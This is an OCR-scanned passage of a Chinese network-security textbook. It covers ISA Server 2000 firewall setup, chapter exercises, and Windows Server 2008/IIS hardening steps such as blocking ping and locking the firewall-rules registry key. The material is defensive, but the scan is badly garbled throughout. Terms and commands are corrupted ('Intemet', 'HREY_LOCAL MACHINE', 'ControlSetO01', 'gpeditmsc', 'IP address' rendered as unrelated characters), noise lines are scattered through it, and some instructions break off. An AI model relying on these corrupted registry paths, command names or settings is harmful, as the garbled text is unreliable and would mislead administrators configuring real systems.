ISA 防火 墙 需要 一 台 装 有 两 个 网 络 适配器 的 计算 机 。 需 要 将 其 中 的 一 个 适配器 连接 到 
内 部 网 络 。 将 另外 一 个 适配器 连接 到 你 的 Intemet 服务 供应 商 (ISP)。ISP 能 帮助 你 建立 
该 连接 。 防 火 墙 通过 阻止 Interet 上 的 其 他 人 访问 内 部 网 络 或 你 的 计算 机 上 的 机 密 信息 ， 
来 充当 企业 Intranet 与 Intemet 之 间 的 安全 屏障 。 

ISA 可 以 安装 在 独立 的 计算 机 上 、Windows NT 域 成 员 计 算 机 上 或 Windows 2000 
Active Directory 域 成 员 的 计算 机 上 。 为 实现 最 高 的 安全 性 ， 应 在 一 台独 立 计 算 机 上 运行 
ISA Server。 


1. 实验 目的 


(1) 掌握 配置 网 络 连接 。 
(2) 掌握 如 何 安 装 ISA Server 2000 Standard Edition。 
(3) 完成 配置 ISA Server， 以 允许 客户 访问 Intemet。 


2. 实验 内 容 
(1) 配置 服务 器 的 网 络 适配器 。 


NNO ED 


(2) 安装 ISA Server 2000 Standard Edition 。 
(3) 配置 ISA Server 以 允许 客户 访问 Internet。 


3. 实验 步骤 


1) “配置 服务 器 的 网 络 适配器 

右键 单 击 桌面 上 的 网 上 邻居 ， 然 后 单 击 属性 。 

右键 单 击 Internet 连接 ， 单 击 重 命名 ， 然 后 输入 Intemet 连接 。 这 将 帮助 你 记 住 哪 块 
网 卡 连接 到 了 Internet。 

右键 单 击 Internet 连接 ， 然 后 单 击 属性 。 

在 常规 选项 不 上 ， 单 击 以 选中 连接 后 在 任务 栏 中 显示 图 标 复 选 框 。 在 该 接口 传输 数据 
时 ， 任 务 栏 上 的 小 图 标 将 闪烁 。 

清除 Microsoft 网 络 客户 机 和 Microsoft 网 络 的 文件 和 打印 机 共享 复 选 框 。ISA Server 
通过 清除 这 些 复 选 框 自动 阻挡 这 些 协 议 ， 从 而 使 你 可 以 节省 内 存 。 

双击 Intemet 协议 (TCP/IP)， 然 后 执行 以 下 步骤 之 一 。 

如 果 你 的 ISP 使 用 DHCP 分 配 IP 地 址 ， 则 在 Intermet 协议 (TCP/IP) 属性 对 话 框 
中 ， 单 击 以 选中 自动 获得 他 地 址 和 自动 获得 DNS 服务 器 地 址 复 选 框 。 

如 果 需 要 手动 输入 ISP 的 人 P 地 址 信息 , 则 在 Intemet 协议 (TCP/IP) 属性 对 话 框 中 ， 
单 击 以 选中 使 用 下 面 的 IP 地 址 ， 然 后 输入 你 的 ISP 提供 的 地 址 、 子 网 掩 码 和 默认 网 关 信 
息 。 单 击 以 选中 使 用 下 面 的 DNS 服务 器 地 址 , 然后 输入 你 的 ISP 提供 的 一 个 或 多 个 DNS 
服务 器 的 名 称 。 

单 击 高 级 ， 然 后 单 击 DNS 选项 卡 。 单 击 以 清除 在 DNS 中 注册 此 连接 的 地 址 复 选 框 。 


注意 : 你 需要 为 内 部 适配器 上 的 内 部 网 络 输 入 永久 的 地 址 和 相应 的 子 网 掩 码 (不 要 在 该 接口 


上 使 用 DHCP)。 将 默认 网 关 留 为 空白 。ISA Server 计算 机 只 需要 一 个 默认 网 关 : 在 
外 部 接口 上 配置 它 。 在 内 部 适配器 上 配置 默认 网 关 会 引起 ISA 故障 。 


2) ”配置 连接 到 网 络 的 内 部 接口 

右键 单 击 网 上 邻居 ， 然 后 选择 属性 。 右 键 单 击 本 地 连接 (LAN)， 选 择 重 命名 ， 然 后 输 
入 局 域 网 。 

右键 单 击 局 域 网 ， 然 后 选择 属性 。 

在 常规 选项 卡 上 ， 单 击 以 选中 连接 后 在 任务 栏 中 显示 图 标 复 选 框 。 

如 果 未 选中 ， 单 击 以 选中 Microsoft 网 络 客户 机 和 Microsoft 网 络 的 文件 和 打印 机 共 
享 复 选 框 。 

双击 Intemet 协议 (TCP/IP)， 然 后 单 击 以 选中 使 用 下 面 的 人 P 地 址 复 选 框 。 

在 IP 地 址 中 ， 输 入 符合 内 部 网 络 地 址 编排 方案 的 内 部 IP 地 址 和 子 网 掩 码 。 将 默认 
网 关 留 为 空白 。 在 首选 DNS 服务 器 中 ,输入 网 络 的 一 台 或 多 台 DNS 服务 器 的 卫 地 址 。 

备注 : 对 于 少 于 255 台 计 算 机 的 小 型 网 络 , 如 果 使 用 Windows 2000 默认 TCP/IP 配 
置 ， 并 且 网 络 中 没有 DNS 服务 器 ， 则 计算 机 依赖 于 自动 专用 他 地 址 分 配 (APIPA)。 应 
该 从 APIPA 迁移 出 来 ， 并 开始 在 客户 机 工作 站 上 使 用 静态 地 址 。 网 络 中 的 每 台 计 算 机 需 
要 一 个 唯一 的 IP 地 址 。 如 果 配 置 了 ISA Server 的 内 部 接口 ， 需 要 输入 静态 地 址 ， 所 以 使 
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用 地 址 192.168.0.254 及 子 网 掩 码 255.255.255.0。 将 默认 网 关 框 留 为 空白 。 在 DNS 服务 器 
字段 中 输入 ISP 的 DNS 服务 器 。 

下 面 在 每 台 客 户 机 上 配置 静态 地 址 。 

在 第 一 台 计 算 机 上 ， 使 用 地 址 192.168.0.1， 子 网 掩 码 为 255.255.255.0， 默 认 网 关 为 
192.168.0.254。 对 于 DNS， 输 入 ISP 的 一 台 ( 或 多 台 ) DNS 服务 器 。 

在 第 二 台 计 算 机 上 ， 使 用 地 址 192.168.0.2， 然 后 使 用 与 上 一 步骤 中 使 用 的 相同 的 值 。 
除 地 址 外 ， 其 他 值 都 相同 ， 只 是 为 每 台 额 外 的 计算 机 递增 地 址 值 。 维 护 一 个 指示 哪些 计算 
机 使 用 哪些 地 址 的 列表 。 

得 到 提示 时 ， 重 新 启动 计算 机 。 

3) ”安装 ISA Server 2000 Standard Edition 

如 果 你 没有 安装 Windows 2000 Service Pack 1 (SP1) 和 从 Microsoft ISA Server 2000 
Standard Edition 光盘 获得 的 修补 程序 ， 应 立即 安装 。 

ISA 安装 程序 提出 一 系列 问题 。 

使 用 ISA Server Setup Wizard(ISA Server 安装 向 导 )， 在 “Welcome( 欢 迎 )” 屏 幕 上 ， 
单 击 Continue( 继 续 )。 在 相应 的 框 中 输入 产品 的 标识 号 。 你 可 以 在 光盘 盒 的 背面 找到 该 
号 码 。 

请 阅读 许可 协议 ， 单 击 IAgree( 同 意 )。 

单 击 Typical installation( 和 典型 安装 ) 作 为 安装 类 型 。 这 将 安装 ISA 服务 和 管理 工具 。 然 
后 选择 安装 模式 : 防火 墙 、 代 理 服务 器 、 集 成 模式 。ISA 停止 计算 机 上 的 相关 服务 。 

为 ISA 配置 本 地 地 址 表 (LAT)。 配 置 LAT 时 需要 仔细 考虑 。 为 你 提供 两 种 选择 : 构 
建 LAT 或 者 使 用 安装 程序 向 导 。 根 据 以 下 条 件 做 出 选择 。 

如 果 知 道内 部 网 络 使 用 的 子 网 , 请 在 这 里 输入 。 不 要 单 击 Construct Table( 建 立 表 ) 按 钮 ! 
如 果 单 击 ， 所 输入 的 LAT 信息 将 会 被 覆盖 。 如 果 不 知道 本 地 子 网 ， 请 单 击 Construct 
Table( 建 立 表 ) 按 钮 。“ISA Setup Wizard(ISA 安装 向 导 )” 将 根据 计算 机 的 路 由 表 确定 本 地 
子 网 。 

如 果 未 选中 ， 请 单 击 以 选中 Add the following private ranges( 添 加 以 下 专用 范围 ) 复 
选 框 。 

如 果 未 选中 ， 请 单 击 以 选中 Add address ranges based on the Windows 2000 routing 
table( 基 于 Windows 2000 路 由 表 增 加 地 址 范围 )。 

单 击 以 清除 包含 与 服务 器 的 外 部 (Intemeb 接 口 相对 应 的 子 网 的 复 选 框 。 

单 击 以 选中 包含 与 服务 器 的 内 部 (LAN) 接 口 相对 应 的 子 网 的 复 选 框 。 

当 安 装 程序 完成 时 ， 启 动 “Administrator Getting Started( 管 理 员 入 门 向 导 )”， 然 后 在 完 
成 该 向 导 之 前 阅读 下 一 节 。 

4) 配置 ISA Server 以 允许 客户 访问 Internet 

ISA Server 安装 后 的 状态 将 阻挡 对 Internet 的 来 往 访问 。 防 火 墙 的 主要 功能 是 在 两 个 
网 络 之 间 充 当 检 查 点 。ISA Server 的 行为 是 通过 策略 阻挡 任何 没有 被 明确 允许 的 内 容 。 
(1) 配置 ISA 安装 后 的 状态 。 
必须 对 访问 策略 的 以 下 两 个 组 件 进行 配置 ， 以 便 客户 机 能 够 访问 Intemet。 


lI EPE 


必须 至 少 配 置 一 个 站 点 和 内 容 规则 ， 在 其 中 指定 用 户 可 访问 哪些 站 点 以 及 可 检索 哪些 


类 型 的 内 容 。 


必须 至 少 配 置 一 个 协议 规则 ， 以 便 指 定 哪些 类 型 的 通信 人 允许 通过 ISA Server。 
安装 完成 后 ，ISA 创建 一 个 默认 站 点 和 内 容 规则 ， 人 允许 所 有 客户 机 在 所 有 时 间 访 问 所 


有 站 点 上 的 所 有 内 容 。 但 是 这 对 于 要 开始 在 Intermet 上 冲浪 的 用 户 来 说 是 不 够 的 :现在 还 
没有 已 定义 的 协议 规则 。 没 有 它 ， 将 不 允许 通过 ISA 的 通信 。 


则 )。 


(2) 入 门 向 导 。 

在 “Getting Started Wizard( 入 门 向 导 )” 中 ， 单 击 Configure Protocol Rules( 配 置 协议 规 
协议 规则 列表 显示 在 Microsoft 管理 控制 台 (MMC) 中 。 

单 击 Create a Protocol Rule( 创 建 协议 规则 )。 输 入 名 称 ， 如 “所 有 协议 ”。 

为 规则 的 操作 单 击 Allow( 人 允许 )( 这 是 默认 值 )。 

单 击 All IP traffic( 所 有 IP 通信 ) 作 为 协议 列表 (这 是 默认 值 )。 

单 击 Always( 始 终 ) 作 为 计划 (这 是 默认 值 )。 

单 击 Any request( 任 何 请 求 ) 作 为 客户 机 类 型 (这 是 默认 值 )。 

单 击 Finish( 完 成 )。 

(3) 创建 用 户 如何 连 接 到 Internet 的 策略 。 

ISA Server 的 作用 远 不 止 多 许 所 有 的 客户 机 使 用 所 有 (已 定义 的 ) 协 议 ,在 所 有 时 间 访 问 


所 有 站 点 上 的 所 有 内 容 。 在 ISA 中 ， 可 以 创建 用 于 准确 定义 用 户 如 何 访问 Intemet 的 访 
问 策略 。 


ISA 访问 策略 由 以 下 三 个 元 素 组 成 。 
@ 站 点 和 内 容 规则 。 

@ 协议 规则 。 

@ "Pp 数据 包 筛选 器 。 

而 这 些 规则 又 由 以 下 策略 元 素 组 成 。 
@ 计划 。 

@ 目标 集合 。 

@ 客户 机 地 址 集合 。 

@ 协议 的 定义 。 

@ 内 容 组 。 

在 试图 使 用 ISA 策略 定义 复杂 内 容 之 前 ， 应 了 解 一 些 依存 关系 。 下 面 描述 哪些 策略 元 


素 属于 哪些 策略 规则 。 


@ 站 点 和 内 容 规则 一 一 协议 规则 。 

@ 目标 集合 一 -协议 的 定义 。 

图 内 容 组 一 一 计划 。 

@ 计划 一 客户 机 地 址 集合 。 

(4) 从 ISA 计算 机 访问 Internet。 

从 ISA 计算 机 本 身 访问 Intemet 会 怎样 ? 已 创建 的 协议 规则 、 站 点 和 内 容 规则 仅 应 用 


于 ISA 服务 器 后 面 的 客户 机 ， 当 客户 机 希望 访问 Intemet 时 ， 只 要 规则 允许 该 请 求 , ISA 就 
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为 该 连接 请 求 创建 一 个 动态 数据 包 筛选 器 。 但是， 如 果 想 在 ISA 计算 机 上 访问 Intermmet， 则 
必须 按照 将 产生 的 通信 的 种 类 创建 静态 数据 包 筛选 器 。 例 如 ， 若 要 访问 一 个 Web 站 点 ,请 
按照 下 列 步骤 操作 。 

在 “ISA Management(ISA 管理 )” 中 ， 展 开 Servers( 服 务 器 )， 展 开 服务 器 名 称 ， 单 击 
Access Policy( 访 问 策略 )， 然 后 单 击 卫 Packet Filters(IP 数据 包 筛 选 器 )。 

单 击 Create a packet filter( 创 建 数据 包 筛 选 器 ) 以 启动 向 导 。 

(5) Web 访问 。 

单 击 Allow packet transmission( 人 允许 数据 包 传输 )， 然 后 单 击 Custom( 自 定义 )。 

单 击 TCP 作为 PP 协议 ， 单 击 Outbound( 出 站 ) 作 为 方向 ， 为 本 地 端口 单 击 All ports( 所 
有 端口 )， 然 后 为 远程 端口 单 击 Fixed port( 固 定 端口 )。 在 Port Number( 端 口号 ) 对 话 框 中 输 
入 80。 

为 ISA 服务 器 上 的 每 个 外 部 接口 选择 默认 IP 地 址 。 

单 击 All remote computers( 所 有 远程 计算 机 )。 

备注 : ISA Server 不 在 LAT 中 的 任何 地 址 和 外 界 之 间 建 立 直接 连接 。 必 须 创建 某 种 能 
够 描述 要 允许 的 访问 的 策略 


本 章 习 题 
一 、 判 断 题 
1. 网 络 防 火 墙 主 要 用 于 防止 网 络 中 的 计算 机 病毒 。 | 
2. 防火 墙 主 要 用 来 防范 内 部 网 络 的 攻击 。 | 
3. 安装 了 防 病 毒 软件 后 ， 还 必须 经 常 对 防 病毒 软件 升级 。 人 
4. 防火墙 构 架 于 内 部 网 与 外 部 网 之 间 ， 是 一 套 独 立 的 硬件 系统 。 《2 
5. 第 四 代 防 火 墙 即 应 用 层 防 火 墙 是 目前 最 先进 的 防火 墙 。 6) 
6.、 芯片 级 防火 墙 基 于 专门 的 硬件 平台 ， 没 有 操作 系统 。 oe 
7. 防火 墙 能 够 有 效 地 解决 来 自 内 部 网 络 的 攻击 和 安全 问题 。 C 
8.、 复合 型 防火 墙 是 内 部 网 与 外 部 网 的 隔离 点 , 起 着 监视 和 隔绝 应 用 层 通信 流 的 作用 ， 
同时 也 常 结合 过 滤器 的 功能 。 ,0 
9. 非法 访问 一 旦 突破 数据 包 过 滤 型 防火 墙 ， 即 可 对 主机 上 的 软件 和 配置 漏洞 进行 
攻击 。 (i 
二 、 简 答题 


1. 防火 墙 的 主要 性 能 指标 有 哪些 ? 

2. 请 根据 如 图 7-18 所 示 的 防火 墙 体 系 结构 的 示意 图 ， 回 答 下 述 问题 。 
(1) 图 中 所 表示 的 防火 墙 体系 结构 属于 哪 种 常见 防火 墙 体 系 结构 类 型 ? 
(2) 图 中 的 堡垒 主机 主要 完成 的 工作 是 什么 ? 


lI EXE 


7-18 ”防火 墙 体系 结构 


第 8 章 网 络 应 用 服务 安全 配置 


【本 章 要 点 】 


通过 本 章 的 学 习 ， 应 该 了 解 常用 的 网 络 应 用 服务 的 种 类 ， 掌 握 IIS 信息 服务 中 的 Web 
服务 器 的 安全 架设 、FTP 服务 器 的 安全 架设 、 文 件 服务 器 的 安全 架设 以 及 域 控制 器 的 安全 
架设 等 知识 和 技能 。 


8.1 网 络 应 用 服务 概述 


网 络 应 用 是 利用 网 络 以 及 信息 系统 直接 为 用 户 提供 服务 以 及 业务 的 平台 。 网 络 应 用 服 
务 直接 与 成 千 上 万 的 用 户 打交道 , 用 户 通过 网 络 应 用 服务 浏览 网 站 、 网 上 购物 、 下 载 文件 、 
看 电视 、 发 短信 等 ， 网 络 应 用 服务 的 安全 直接 关系 到 广大 网 络 用 户 的 利益 。 因 此 网 络 应 用 
服务 的 安全 是 网 络 与 信息 安全 中 的 重要 组 成 部 分 。 

网 络 应 用 服务 ， 是 在 网 络 上 利用 软 / 硬 件 平台 满足 特定 信息 传递 和 处 理 需 求 的 行为 。 指 
的 是 在 网 络 上 所 开放 的 一 些 服务 ， 通 常 能 见 到 的 如 Web、MAIL、FTP、DNS、TELNET 等 。 
当然 ， 也 有 一 些 非 通用 的 ， 如 在 某 些 领域 、 行 业 中 自主 开发 的 网 络 应 用 服务 。 我 们 通常 所 
说 的 服务 器 ， 即 是 具有 网 络 服务 的 主机 。 

网 络 应 用 服务 安全 ， 指 的 是 主机 上 运行 的 网 络 应 用 服务 是 否 能 够 稳定 、 持 续 运行 ， 不 
会 受到 非法 的 数据 破坏 及 运行 影响 。 


8.1.1 网 络 应 用 服务 安全 问题 的 特点 


每 一 个 网 络 应 用 服务 都 是 由 一 个 或 多 个 程序 构成 ， 在 讨论 安全 性 问题 时 ， 不 仅 要 考虑 
到 服务 端 程序 ， 也 需要 考虑 到 客户 端 程序 。 服 务 端的 安全 问题 主要 表现 在 非法 的 远程 访问 ， 
客户 端的 安全 问题 主要 表现 在 本 地 越权 使 用 客户 程序 。 由 于 大 多 数 服务 的 进程 由 超级 用 户 
守护 ， 许 多 重大 的 安全 漏洞 往往 出 现在 一 些 以 超级 用 户 守护 的 应 用 服务 程序 上 。 


8.1.2 网络 应 用 服务 的 分 类 


网 络 应 用 服务 可 以 有 多 种 分 类 方法 。 一 些 典 型 的 分 类 方法 有 : 按照 技术 特征 分 类 ， 点 
到 点 业务 与 点 到 多 点 业务 ; 按照 电信 业务 分 类 ， 基 础 电信 业务 和 增值 电信 业务 ; 按照 是 否 
经 营 分 类 ， 经 营 性 网 络 应 用 服务 与 非 经 营 性 网 络 应 用 服务 ; 按照 所 传递 加 工 的 信息 分 类 ， 
自主 保护 、 指 导 保护 、 监 督 保护 、 强 制 保护 与 专 控 保护 五 级 ;按照 服务 涉及 的 范围 分 类 ， 
公众 类 网 络 应 用 服务 与 非 公众 类 网 络 应 用 服务 。 

各 个 分 类 方式 从 不 同 角 度 将 网 络 应 用 服务 进行 了 分 类 。 本 文采 用 公众 类 网 络 应 用 服务 
与 非 公众 类 网 络 应 用 服务 的 分 类 方法 。 

公众 信息 类 网 络 应 用 是 在 公众 网 络 范围 内 ， 信 息 发 送 者 不 指定 信息 接收 者 情况 下 的 网 
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络 应 用 。 信 息 发 送 者 将 信息 发 送 到 应 用 平台 上 ， 信 息 接收 者 主动 决定 是 否 通过 网 络 接 收 信 
息 的 网 络 应 用 ， 信 息 发 送 者 在 一 定 范围 内 以 广播 或 组 播 的 方式 不 指定 信息 接收 者 强行 推送 
信息 。 公 众 信息 类 网 络 应 用 通常 涉及 网 络 媒体 ， 主 要 包括 有 BBS、 网 络 聊天 室 、WWW 服 
务 、IPTV、 具 有 聊天 室 功 能 的 网 络 游戏 等 应 用 。 

非 公众 信息 类 网 络 应 用 是 在 公众 网 络 范围 内 ， 信 息 发 送 者 指定 信息 接收 者 的 网 络 应 用 
以 及 非 公众 网 络 范围 内 的 网 络 应 用 。 非 公众 信息 类 网 络 应 用 类 型 中 ， 公 众 网 络 上 一 般 是 点 
到 点 的 信息 传播 的 网 络 应 用 ， 主 要 有 : 普通 QQ 应 用 、 普 通 MSN 应 用 、 普 通 E-mail、P2P 
的 VoIP、 电 子 商务 等 应 用 。 


8.2 1IS Web 服务 器 的 安全 架设 


因为 IS(Internet Information Server) 的 方便 性 和 易 用 性 , 使 它 成 为 最 受 欢迎 的 Web 服务 
器 软件 之 一 。 但 是 , IIS 的 安全 性 却 一 直 令 人 担忧 。 如 何 利用 IIS 建立 一 个 安全 的 Web 服务 
器 ， 是 很 多 人 关心 的 话题 。 


8.2.1 构造 一 个 安全 系统 


要 创建 一 个 安全 可 靠 的 Web 服务 器 ， 必 须要 实现 Windows 2008 和 IIS 的 双重 安全 ， 
因为 IS 的 用 户 同时 也 是 Windows 2008 的 用 户 , 并且 IIS 目录 的 权限 依赖 Windows 的 NTFS 
文件 系统 的 权限 控制 ,所 以 保护 IS 安全 的 第 一 步 就 是 确保 Windows 2008 操作 系统 的 安全 。 

]) 及 时 打 补 丁 

可 以 通过 安装 系统 更 新 或 者 使 用 第 三 方 软件 安装 漏洞 补丁 。 系 统 更 新 窗口 如 图 8-1 和 
图 8-2 所 示 。 
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8-1 ”系统 更 新 窗口 


2) 禁止 外 网 的 非法 ping 入 
巧妙 地 利用 Windows 系统 自 带 的 ping 命令 ， 可 以 快速 判断 局 域 网 中 某 台 重要 计算 
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| 人 


机 的 网 络 连通 性 ; 可 是 ping 命令 在 给 我 们 带 来 实用 的 同时 , 也 容易 被 一 些 恶意 用 户 所 利用 ， 
例如 ， 恶 意 用 户 要 是 借助 专业 工具 不 停 地 向 重要 计算 机 发 送 ping 命令 测试 包 时 ， 重 要 计算 
机 系统 由 于 无 法 对 所 有 测试 包 进行 应 答 , 从 而 容易 出 现 瘫 痪 现象 .为 了 保证 Windows Server 
2008 服务 器 系统 的 运行 稳定 性 ， 可 以 修改 该 系统 的 组 策略 参数 ， 禁 止 来 自 外 网 的 非法 ping 
攻击 。 
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8-2 第 三 方 软件 修复 漏洞 窗口 


首先 以 特权 身份 登录 进入 Windows Server 2008 服务 器 系统 , 依次 选择 该 系统 桌面 上 的 
“开始 ”一 “运行 ”命令 ， 在 弹出 的 系统 运行 对 话 框 中 ， 输 入 字符 串 命令 “gpeditmsc”， 
按 Enter 键 后 ， 进 入 对 应 系统 的 控制 台 窗口 。 

其 次 选中 该 控制 台 左 侧 列 表 中 的 “计算 机 配置 ”节点 选项 ， 并 从 目标 节点 下 面 逐 一 选 
择 “Windows 设置 ”、“ 安 全 设置 ”、“ 高 级 安全 Windows 防火 墙 ”、“ 高 级 安全 Windows 
防火 墙 一 一 本 地 组 策略 对 象 ”选项 ， 再 用 鼠标 选中 目标 选项 下 面 的 “入 站 规则 ”项 目 。 

接着 在 对 应 “入 站 规则 ”项 目 右 侧 的 “操作 ”列表 中 ， 选 择 “ 新 规则 ”选项 ， 此 时 系 
统 屏幕 会 自动 弹出 新 建 入 站 规则 向 导 对 话 框 ,依照 向 导 屏 幕 的 提示 ， 先 将 “ 自 定义 ”选项 选中 ， 
再 将 “所 有 程序 ”项 目 选中 ， 之 后 从 协议 类 型 列表 中 选择 ICMPv4 选项 ， 如 图 8-3 所 示 。 


= | 


8-3 协议 类 型 列表 中 选择 ICMPv4 选项 


中 | 上] 萝 音 。 克 络 应 万 忧 务 安 全 可 得 


然后 根据 向 导 窗 口 提示 ， 单 击 “ 下 一 步 ” 按 钮 ， 连 接 条 件 选 中 “阻止 连接 ” 单 选 按 


钮 ， 如 图 8-4 所 示 。 


sm IE mw | 


图 8-4 操作 选中 “阻止 连接 ” 单 选 按钮 
同时 依照 实际 情况 设置 好 对 应 入 站 规则 的 应 用 环境 ， 最 后 为 当前 创建 的 入 站 规则 设置 
一 个 适当 的 名 称 。 完 成 上 面 的 设置 任务 后 ， 如 图 8-5 所 示 ， 将 Windows Server 2008 服务 器 
系统 重新 启动 一 下 , 这 样 Windows Server 2008 服务 器 系统 日 后 就 不 会 轻易 受到 来 自 外 网 的 


非法 ping 测试 攻击 了 。 
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图 8-5 ”本 地 组 策略 配置 完成 


尽管 通过 Windows Server 2008 服务 器 系统 自 带 的 高 级 安全 防火 墙 功 能 , 可 以 实现 很 多 
安全 防范 目的 ， 不 过 对 黑客 而 言 ， 他 们 可 以 想 办 法 修改 防火 墙 的 安全 规则 ， 那 样 ， 我 们 自 
行 定义 的 各 种 安全 规则 可 能 发 挥 不 了 任何 作用 。 为 了 阻止 黑客 随意 修改 Windows Server 
2008 服务 器 系统 的 防火 墙 安全 规则 ， 我 们 可 以 进行 相关 的 设置 。 
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首先 打开 Windows Server 2008 服务 器 系统 的 “开始 ”菜单 ， 选 择 “ 运 行 ” 命 令 ， 在 弹 
出 的 系统 运行 文本 框 中 执行 “regedit” 字 符 串 命令 ， 打 开 系 统 注册 表 控制 台 窗口 ， 选中 该 
窗口 左 侧 显示 区 域 处 的 HREY _ LOCAL MACHINE 节点 选项 ， 同 时 从 目标 分 支 下 面 选中 
SYSTEM\ControlSetO01\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules 注册 
表 子 项 ， 该 子 项 下 面 保存 有 很 多 安全 规则 ， 如 图 8-6 所 示 。 
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图 8-6 选择 注册 表 FirewallRules 子 项 


其 次 打开 注册 表 控 制 台 窗口 中 的 “编辑 ”下 拉 菜 单 ， 从 中 选择 “权限 ”选项 ， 打 开 权 
限 设置 对 话 框 ， 单 击 该 对 话 框 中 的 “添加 ”按钮 ， 从 其 后 出 现 的 账号 选择 框 中 选择 
“Everyone” 账 号 ， 同 时 将 其 导入 进来 ， 再 将 对 应 该 账号 的 “完全 控制 ”权限 调整 为 “ 拒 
绝 ”， 最 后 单 击 “ 确 定 ”按钮 执行 设置 保存 操作 ， 如 此 一 来 非法 用 户 日 后 就 不 能 随意 修改 
Windows Server 2008 服务 器 系统 的 各 种 安全 控制 规则 了 。 

3) 限制 使 用 下 载 软件 进行 恶意 下 载 

在 多 人 共同 使 用 一 台 计 算 机 进行 工作 时 ， 我 们 肯定 不 希望 普通 用 户 随意 使 用 下 载 软件 
进行 恶意 下 载 ， 这 样 不 但 容易 占用 本 地 系统 的 磁盘 空间 资源 ， 而 且 也 会 大 大 消耗 本 地 系统 
的 上 网 带宽 资源 。 而 在 Windows Server 2008 系统 环境 下 ， 限 制 普通 用 户 随意 使 用 下 载 软件 
进行 恶意 下 载 的 方法 有 很 多 , 例如 可 以 利用 Windows Server 2008 系统 新 增加 的 高 级 安全 防 
火 墙 功能 ， 或 者 通过 限制 下 载 端口 等 方法 来 实现 上 述 控制 ， 其 实 除了 这 些 方 法 外 ， 还 可 以 
利用 该 系统 的 软件 限制 策略 来 达到 这 一 目的 ， 具 体 实 现 步骤 如 下 。 


ME 


首先 以 系统 管理 员 权限 登录 进入 Windows Server 2008 系统 ， 打 开 该 系统 的 “开始 ” 菜 
单 ， 从 中 选择 “运行 ”命令 ,在 弹出 的 系统 运行 文本 框 中 ,输入 “gpedit.msc” 字 符 串 命令 ， 
进入 对 应 系统 的 组 策略 控制 台 窗 口 。 

其 次 在 该 控制 台 窗 口 的 左 侧 位 置 处 ， 依 次 选择 “计算 机 配置 ”一 “Windows 设置 ”一 
“安全 设置 ”一 “软件 限制 策略 ”选项 ， 同 时 用 鼠标 右键 单 击 该 选项 ， 并 选择 行 快捷 菜单 
中 的 “创建 软件 限制 策略 ”命令 ， 如 图 8-7 所 示 。 
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图 8-7 创建 软件 限制 策略 


接着 在 对 应 “软件 限制 策略 ”选项 的 右 侧 显示 区 域 ， 用 鼠标 双击 “强制 ”组 策略 项 目 ， 
如 图 8-8 所 示 ， 然 后 打开 图 8-9 所 示 的 “强制 ”属性 ”对 话 框 ， 选 择 其 中 的 “ 除 本 地 管理 
员 以 外 的 所 有 用 户 ” 选项 ， 其 余 参数 都 保持 默认 设置 ， 再 单 击 “ 确 定 ”按钮 结束 上 述 设 置 操 作 。 
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图 8-9 “强制 属性 ”对 话 框 
再 选择 “软件 限制 策略 ”节点 下 面 的 “其 他 规则 ”选项 ， 如 图 8-10 所 示 。 


文件 中 操作 下 看 MW 孝 助 0 
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[ I 
图 8-10 选择 “其 他 规则 ”选项 

用 鼠标 右键 单 击 该 组 策略 选项 ， 从 弹出 的 快捷 菜单 中 选择 “新 建 路 径 规则 ”命令 ， 如 
图 8-11 所 示 ， 在 其 后 出 现 的 设置 对 话 框 中 ， 单 击 “ 浏 览 ” 按 钮 ， 如 图 8-12 所 示 ， 再 选中 
相应 的 下 载 软件 程序 ， 同 时 将 对 应 该 应 用 程序 的 “安全 级 别 ” 参 数 设置 为 “不 允许 ”， 最 
后 单 击 “确定 ”按钮 执行 参数 设置 保存 操作 。 
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图 8-12 “新 建 路 径 规则 ”设置 对 话 框 


重新 启动 一 下 Windows Server 2008 系统 ， 当 用 户 以 普通 权限 账号 登录 进入 该 系统 后 ， 
普通 用 户 就 不 能 正常 使 用 下 载 软件 进行 恶意 下 载 了 ， 不 过 当 我 们 以 系统 管理 员 权限 进入 本 
地 计算 机 系统 时 ， 仍 然 可 以 正常 运行 下 载 软件 程序 进行 随意 下 载 。 

4) 防止 在 临时 文件 中 隐藏 网 络 病毒 

现在 Internet 网 络 上 的 病毒 疯狂 肆虐 ， 一 些 “ 狼 猎 ”的 网 络 病毒 为 了 躲避 杀毒 软件 的 追 
杀 ， 人 往往 会 想方设法 地 将 自己 隐藏 于 系统 临时 文件 夹 中 ， 这 样 杀 毒 软件 即使 找到 它 ， 也 对 
它 无 可 奈何 ， 因 为 杀毒 软件 对 系统 临时 文件 夹 没 有 操作 权限 。 为 了 防止 网 络 病毒 隐藏 在 系 
统 临 时 文件 夹 中 ， 可 以 对 Windows Server 2008 系统 的 软件 限制 策略 进行 如 下 设置 。 

首先 ， 进 入 对 应 系统 的 组 策略 控制 台 窗 口 。 


加 
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图 一 


其 次 在 该 控制 台 窗口 的 左 侧 位 置 处 ， 依 次 选择 “计算 机 配置 ”一 “Windows 设置 ”一 
“安全 设置 ”一 “软件 限制 策略 ”一 “其 他 规则 ”选项 ， 同 时 用 鼠标 右键 单 击 该 选项 ， 并 
选择 快捷 菜单 中 的 “新 建 路 径 规则 ”命令 ， 打 开 如 图 8-13 所 示 的 设置 对 话 框 ; 单 击 其 中 的 
“浏览 ”按钮 ， 从 弹出 的 文件 选择 对 话 框 中 ， 选 中 并 导入 Windows Server 2008 系统 的 临时 
文件 夹 ， 同 时 再 将 “安全 级 别 ” 参 数 设 置 为 “不 允许 ”， 最 后 单 击 “ 确 定 ” 按 钮 保存 好 上 
述 设 置 操作 ， 这 样 网 络 病毒 就 不 能 躲藏 到 系统 的 临时 文件 夹 中 了 。 


一 其 他 规则 
田 国 应 用 程序 控制 
田 需 开支 全 第 略 ， 
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图 8-13 在 “新 建 路 径 规则 ”对 话 框 中 设置 临时 文件 夹 


5) 禁止 普通 用 户 随意 上 网 访问 

通常 Windows Server 2008 系统 都 被 安装 到 重要 的 计算 机 中 ,例如 单位 的 服务 器 ,为 了 
防止 该 计算 机 系统 受到 安全 威胁 ， 需 要 限制 普通 用 户 在 该 系统 中 随意 上 网 访问 。 如 果 简单 
关闭 该 系统 的 上 网 访问 权限 ， 又 会 影响 特权 用 户 正 常 上 网 ， 我 们 可 以 通过 修改 Windows 
Server 2008 系统 的 组 策略 参数 来 实现 限制 普通 用 户 上 网 ， 而 又 不 影响 特权 用 户 进行 上 网 访问 。 

首先 以 普通 权限 的 账号 登录 Windows Server 2008 系统 ， 打 开 对 应 系统 中 的 正 浏览 器 
窗口 ， 单 击 其 中 的 “工具 ”菜单 项 ， 从 下 拉 菜 单 中 选择 “Intemet 选项 ”命令 ， 弹 出 Internet 
选项 设置 窗口 。 

